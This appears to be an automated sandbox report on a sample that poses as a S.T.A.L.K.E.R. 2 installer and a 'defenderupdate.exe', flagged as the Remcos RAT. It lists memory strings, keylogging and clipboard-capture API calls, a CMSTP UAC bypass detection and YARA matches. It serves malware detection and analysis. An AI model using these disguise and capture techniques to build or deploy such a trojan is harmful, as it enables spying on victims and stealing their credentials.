                  Source: eBHn6qHPLz.exe, 00000000.00000002.1871058602.00000000046AE000.00000004.00000800.00020000.00000000.sdmp, eBHn6qHPLz.exe, 00000000.00000002.1871058602.0000000003FC6000.00000004.00000800.00020000.00000000.sdmp, defenderupdate.exe, 00000008.00000002.2183906073.0000000004643000.00000004.00000800.00020000.00000000.sdmp, defenderupdate.exe, 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                  Source: eBHn6qHPLz.exe, 00000004.00000002.3538658538.00000000011D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpE
                  Source: eBHn6qHPLz.exe, 00000004.00000002.3538658538.000000000122B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpO
                  Source: eBHn6qHPLz.exe, 00000004.00000002.3538658538.00000000011D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpT
                  Source: eBHn6qHPLz.exe, 00000004.00000002.3538658538.00000000011EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpe
                  Source: eBHn6qHPLz.exe, 00000004.00000002.3538658538.000000000122B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gph
                  Source: eBHn6qHPLz.exe, 00000004.00000002.3538658538.000000000122B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpl5m8
                  Source: eBHn6qHPLz.exe, 00000004.00000002.3538658538.00000000011D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpx
                  Source: eBHn6qHPLz.exe, 00000000.00000002.1871058602.0000000003FC6000.00000004.00000800.00020000.00000000.sdmp, setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).exe.0.drString found in binary or memory: http://ocsp.digicert.com0
                  Source: eBHn6qHPLz.exe, 00000000.00000002.1871058602.0000000003FC6000.00000004.00000800.00020000.00000000.sdmp, setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).exe.0.drString found in binary or memory: http://ocsp.sectigo.com0
                  Source: eBHn6qHPLz.exe, 00000000.00000002.1859614323.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, defenderupdate.exe, 00000008.00000002.2168900167.00000000032F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: eBHn6qHPLz.exe, 00000000.00000002.1871058602.0000000003FC6000.00000004.00000800.00020000.00000000.sdmp, setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).exe.0.drString found in binary or memory: http://www.digicert.com/CPS0
                  Source: setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).exe, 00000002.00000002.3538258325.000000000299A000.00000004.00001000.00020000.00000000.sdmp, setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).exe, 00000002.00000003.1851801236.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmp, 00000003.00000002.3540778391.000000000278B000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.dk-soft.org/
                  Source: setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).exe, 00000002.00000003.1851801236.0000000002B80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.gog.com$http://www.gog.com$http://www.gog.com.436.
                  Source: setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).exe, 00000002.00000002.3538258325.0000000002A23000.00000004.00001000.00020000.00000000.sdmp, setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmp, 00000003.00000002.3540778391.0000000002853000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.gog.com03
                  Source: setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).exe, 00000002.00000003.1853902213.000000007F6D0000.00000004.00001000.00020000.00000000.sdmp, setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).exe, 00000002.00000003.1853202895.0000000002CC0000.00000004.00001000.00020000.00000000.sdmp, setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmp, 00000003.00000000.1854814903.0000000000E01000.00000020.00000001.01000000.00000008.sdmp, setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmp.2.drString found in binary or memory: http://www.innosetup.com/
                  Source: eBHn6qHPLz.exe, 00000000.00000002.1871058602.0000000003F99000.00000004.00000800.00020000.00000000.sdmp, setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).exe, 00000002.00000000.1851295333.00000000006F1000.00000020.00000001.01000000.00000007.sdmp, setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).exe.0.drString found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
                  Source: setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).exe, 00000002.00000003.1853902213.000000007F6D0000.00000004.00001000.00020000.00000000.sdmp, setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).exe, 00000002.00000003.1853202895.0000000002CC0000.00000004.00001000.00020000.00000000.sdmp, setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmp, 00000003.00000000.1854814903.0000000000E01000.00000020.00000001.01000000.00000008.sdmp, setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmp.2.drString found in binary or memory: http://www.remobjects.com/ps
                  Source: eBHn6qHPLz.exe, 00000000.00000002.1891174679.0000000006410000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                  Source: eBHn6qHPLz.exe, 00000000.00000002.1891174679.0000000006410000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                  Source: eBHn6qHPLz.exe, 00000000.00000002.1891174679.0000000006410000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                  Source: eBHn6qHPLz.exe, 00000000.00000002.1871058602.0000000003FC6000.00000004.00000800.00020000.00000000.sdmp, setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).exe.0.drString found in binary or memory: https://sectigo.com/CPS0
                  Source: eBHn6qHPLz.exe, 00000000.00000002.1891174679.0000000006410000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                  Source: eBHn6qHPLz.exe, 00000000.00000002.1891174679.0000000006410000.00000004.08000000.00040000.00000000.sdmp, eBHn6qHPLz.exe, 00000000.00000002.1859614323.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, defenderupdate.exe, 00000008.00000002.2168900167.00000000032F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                  Source: eBHn6qHPLz.exe, 00000000.00000002.1891174679.0000000006410000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                  Source: setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).exe, 00000002.00000002.3540772142.000000007F820000.00000004.00001000.00020000.00000000.sdmp, setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).exe, 00000002.00000003.1851801236.0000000002B80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.gog.com/galaxy

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 9_2_004099E4 SetWindowsHookExA 0000000D,004099D0,000000009_2_004099E4
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 9_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,9_2_004159C6
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 9_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,9_2_004159C6
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 9_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,9_2_004159C6
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 9_2_00409B10 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,9_2_00409B10
                  Source: Yara matchFile source: 0.2.eBHn6qHPLz.exe.45d4110.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.defenderupdate.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.eBHn6qHPLz.exe.45d4110.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.defenderupdate.exe.4685cf8.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.defenderupdate.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.defenderupdate.exe.4685cf8.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.eBHn6qHPLz.exe.4251578.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.1871058602.00000000046AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.2183906073.0000000004643000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1871058602.0000000003FC6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: eBHn6qHPLz.exe PID: 7336, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: defenderupdate.exe PID: 7944, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: defenderupdate.exe PID: 8040, type: MEMORYSTR

                  E-Banking Fraud

                  barindex
                  Source: Yara matchFile source: 0.2.eBHn6qHPLz.exe.45d4110.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.defenderupdate.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.eBHn6qHPLz.exe.45d4110.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.defenderupdate.exe.4685cf8.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.defenderupdate.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.defenderupdate.exe.4685cf8.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.eBHn6qHPLz.exe.4251578.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000004.00000002.3538658538.00000000011EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.2166640000.0000000000D67000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1871058602.00000000046AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.3538658538.00000000011D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.2183906073.0000000004643000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1871058602.0000000003FC6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: eBHn6qHPLz.exe PID: 7336, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: eBHn6qHPLz.exe PID: 7612, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: defenderupdate.exe PID: 7944, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: defenderupdate.exe PID: 8040, type: MEMORYSTR

                  Spam, unwanted Advertisements and Ransom Demands

                  barindex
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 9_2_0041BB71 SystemParametersInfoW,9_2_0041BB71
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 9_2_0041BB77 SystemParametersInfoW,9_2_0041BB77

                  System Summary

                  barindex
                  Source: 0.2.eBHn6qHPLz.exe.45d4110.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 0.2.eBHn6qHPLz.exe.45d4110.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 0.2.eBHn6qHPLz.exe.45d4110.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 9.2.defenderupdate.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 9.2.defenderupdate.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 9.2.defenderupdate.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 0.2.eBHn6qHPLz.exe.45d4110.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 0.2.eBHn6qHPLz.exe.45d4110.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 0.2.eBHn6qHPLz.exe.45d4110.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 8.2.defenderupdate.exe.4685cf8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 8.2.defenderupdate.exe.4685cf8.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 8.2.defenderupdate.exe.4685cf8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 9.2.defenderupdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 9.2.defenderupdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 9.2.defenderupdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 8.2.defenderupdate.exe.4685cf8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 8.2.defenderupdate.exe.4685cf8.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 8.2.defenderupdate.exe.4685cf8.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 0.2.eBHn6qHPLz.exe.4251578.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 0.2.eBHn6qHPLz.exe.4251578.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 00000000.00000002.1871058602.00000000046AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000008.00000002.2183906073.0000000004643000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 00000000.00000002.1871058602.0000000003FC6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: eBHn6qHPLz.exe PID: 7336, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: defenderupdate.exe PID: 7944, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: defenderupdate.exe PID: 8040, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeCode function: 0_2_04C0D8D0 NtProtectVirtualMemory,0_2_04C0D8D0
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeCode function: 0_2_04C0FA20 NtResumeThread,0_2_04C0FA20
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeCode function: 0_2_04C0D8C8 NtProtectVirtualMemory,0_2_04C0D8C8
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeCode function: 0_2_04C0D997 NtProtectVirtualMemory,0_2_04C0D997
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeCode function: 0_2_04C0FA18 NtResumeThread,0_2_04C0FA18
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 8_2_06B7B6B8 NtProtectVirtualMemory,8_2_06B7B6B8
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 8_2_06B7D808 NtResumeThread,8_2_06B7D808
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 8_2_06B7B6B1 NtProtectVirtualMemory,8_2_06B7B6B1
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 8_2_06B7D800 NtResumeThread,8_2_06B7D800
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 9_2_004158B9 ExitWindowsEx,LoadLibraryA,GetProcAddress,9_2_004158B9
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeCode function: 0_2_00EECA440_2_00EECA44
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeCode function: 0_2_00EEF4E80_2_00EEF4E8
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeCode function: 0_2_00EEF4F80_2_00EEF4F8
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeCode function: 0_2_04B915B00_2_04B915B0
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeCode function: 0_2_04B9EB600_2_04B9EB60
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeCode function: 0_2_04B9C4C70_2_04B9C4C7
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeCode function: 0_2_04B990670_2_04B99067
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeCode function: 0_2_04B9B1E90_2_04B9B1E9
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeCode function: 0_2_04B99D2F0_2_04B99D2F
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeCode function: 0_2_04B9AE280_2_04B9AE28
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeCode function: 0_2_04B9AE180_2_04B9AE18
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeCode function: 0_2_04B9EB500_2_04B9EB50
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeCode function: 0_2_04BA12C00_2_04BA12C0
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeCode function: 0_2_04BA24C80_2_04BA24C8
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeCode function: 0_2_04BA15E70_2_04BA15E7
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeCode function: 0_2_04C0A3680_2_04C0A368
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeCode function: 0_2_04C042480_2_04C04248
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeCode function: 0_2_04C0A3590_2_04C0A359
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeCode function: 0_2_04C0E3240_2_04C0E324
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeCode function: 0_2_064773E80_2_064773E8
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeCode function: 0_2_0647F0980_2_0647F098
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeCode function: 0_2_064773D80_2_064773D8
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeCode function: 0_2_064700400_2_06470040
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeCode function: 0_2_064700060_2_06470006
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeCode function: 0_2_064760D00_2_064760D0
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeCode function: 0_2_064778AB0_2_064778AB
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeCode function: 0_2_064778B80_2_064778B8
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeCode function: 0_2_064761080_2_06476108
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeCode function: 0_2_064761180_2_06476118
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeCode function: 0_2_066200400_2_06620040
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeCode function: 0_2_0662001E0_2_0662001E
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeCode function: 0_2_068306080_2_06830608
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeCode function: 0_2_06830C500_2_06830C50
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeCode function: 0_2_06830C600_2_06830C60
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeCode function: 0_2_068305F80_2_068305F8
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeCode function: 0_2_0688EAA80_2_0688EAA8
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeCode function: 0_2_0688DFA80_2_0688DFA8
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 8_2_018ACA448_2_018ACA44
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 8_2_018AF4E88_2_018AF4E8
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 8_2_018AF4F88_2_018AF4F8
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 8_2_06A715B08_2_06A715B0
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 8_2_06A7AE288_2_06A7AE28
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 8_2_06A7AE188_2_06A7AE18
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 8_2_06A790678_2_06A79067
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 8_2_06A7B1E98_2_06A7B1E9
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 8_2_06A812BD8_2_06A812BD
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 8_2_06A824C88_2_06A824C8
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 8_2_06A815E78_2_06A815E7
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 8_2_06A973E88_2_06A973E8
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 8_2_06A973698_2_06A97369
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 8_2_06A9F0988_2_06A9F098
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 8_2_06A973D88_2_06A973D8
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 8_2_06A978AA8_2_06A978AA
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 8_2_06A960D08_2_06A960D0
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 8_2_06A900068_2_06A90006
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 8_2_06A900408_2_06A90040
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 8_2_06A961088_2_06A96108
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 8_2_06A961188_2_06A96118
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 8_2_06B77D488_2_06B77D48
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 8_2_06B7E2908_2_06B7E290
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 8_2_06B7E2838_2_06B7E283
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 8_2_06B71FE08_2_06B71FE0
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 8_2_06B7E8A88_2_06B7E8A8
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 8_2_06B7E1F88_2_06B7E1F8
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 8_2_06B7E9388_2_06B7E938
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 8_2_06B77D388_2_06B77D38
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 8_2_06B7E9288_2_06B7E928
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 8_2_06C400408_2_06C40040
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 8_2_06C4001E8_2_06C4001E
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 8_2_06EADFA88_2_06EADFA8
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 9_2_0041D0719_2_0041D071
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 9_2_004520D29_2_004520D2
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 9_2_0043D0989_2_0043D098
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 9_2_004371509_2_00437150
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 9_2_004361AA9_2_004361AA
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 9_2_004262549_2_00426254
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 9_2_004313779_2_00431377
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 9_2_0043651C9_2_0043651C
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 9_2_0041E5DF9_2_0041E5DF
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 9_2_0044C7399_2_0044C739
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 9_2_004367C69_2_004367C6
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 9_2_004267CB9_2_004267CB
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 9_2_0043C9DD9_2_0043C9DD
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 9_2_00432A499_2_00432A49
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 9_2_00436A8D9_2_00436A8D
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 9_2_0043CC0C9_2_0043CC0C
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 9_2_00436D489_2_00436D48
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 9_2_00434D229_2_00434D22
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 9_2_00426E739_2_00426E73
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 9_2_00440E209_2_00440E20
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 9_2_0043CE3B9_2_0043CE3B
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 9_2_00412F459_2_00412F45
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 9_2_00452F009_2_00452F00
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 9_2_00426FAD9_2_00426FAD
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: String function: 00401F66 appears 50 times
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: String function: 004020E7 appears 39 times
